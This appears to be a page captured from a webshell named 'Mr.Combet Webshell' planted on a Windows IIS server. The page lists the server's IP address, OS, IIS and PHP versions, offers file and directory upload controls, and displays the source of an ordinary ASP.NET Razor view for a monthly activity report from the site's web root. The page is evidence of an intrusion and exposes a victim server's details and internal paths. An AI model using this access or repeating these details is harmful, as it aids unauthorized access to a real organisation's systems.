Mr.Combet Webshell
Your IP :
216.73.216.136
Server IP :
103.233.58.157
Server :
Windows NT WIN-4PGF72KEHKB 10.0 build 17763 (Windows Server 2016) AMD64
Server Software :
Microsoft-IIS/10.0
PHP Version :
7.3.25
Add File :
Submit
Add Directory :
Submit
Dir :
C:
/
inetpub
/
wwwroot
/
mapqa_bak
/
mapqa
/
Views
/
WorkPlan
/
View File Name :
_MyActivitiesLevelTwoList.cshtml
@using PagedList.Mvc; @model PagedList.IPagedList<RER_Project.DataAccess.Functions.Fn_ActivityMonthWiseReport> @{ Layout = null; } @if (Model.Count > 0) { <div class="table-responsive" style="margin-top: 16px;"> @foreach (var group in Model.GroupBy(x => x.FiscalYear)) { <h4 style="background-color: #e9e9e9; padding: 8px 8px;">@group.Key</h4> <table class="footable table table-hover"> <thead> <tr> <th>Activity</th> <th>Sub Task Count</th> <th>SubTask</th> <th>January</th> <th>February</th> <th>March</th> <th>April</th> <th>May</th> <th>June</th> <th>July</th> <th>August</th> <th>September</th> <th>October</th> <th>November</th> <th>December</th> @*<th>Remarks</th>*@ <th>Action</th> </tr> </thead> <tbody> @foreach (var item in group) { <tr> <td>@item.Activity</td> <td style="text-align:center">@item.totalCount</td> <td>@item.subtask</td> <td>@item.January_Y / @item.January_dat</td> <td>@item.February_Y / @item.February_dat</td> <td>@item.March_Y / @item.March_dat</td> <td>@item.April_Y / @item.April_dat</td> <td>@item.May_Y / @item.May_dat</td> <td>@item.June_Y / @item.June_dat</td> <td>@item.July_Y / @item.July_dat</td> <td>@item.August_Y / @item.August_dat</td> <td>@item.September_Y / @item.September_dat</td> <td>@item.October_Y / @item.October_dat</td> <td>@item.November_Y / @item.November_dat</td> <td>@item.December_Y/ @item.December_dat</td> @*<td>@item.PriorityActivityOne</td>*@ <td> @if (item.ActivityMemberType == 1) { <a class="btn btn-default btn-xs" href="@("/activities/reporting/createother?activityId=" + item.ActivityId +"&fiscalYear="+group.Key +"&fyId="+item.FiscalYearId+"&subtask="+item.subtask)"> <i class="fa fa-plus"></i> </a> } else { <a class="btn btn-default btn-xs" href="@("/activities/reporting/create?activityId=" + item.ActivityId +"&fiscalYear="+group.Key + "&assignedBy=" + item.AssignedBy+"&subtask="+item.subtask)"> <i class="fa fa-plus"></i> </a> } </td> </tr> } </tbody> </table> } <div id="myPager" align="center"> @if (Model.Count > 0) { @Html.PagedListPager(Model, page => Url.Action("activities/leveltwo", new { page }), PagedListRenderOptions.ClassicPlusFirstAndLast) } </div> </div> } else { <div><center>No Data</center></div> }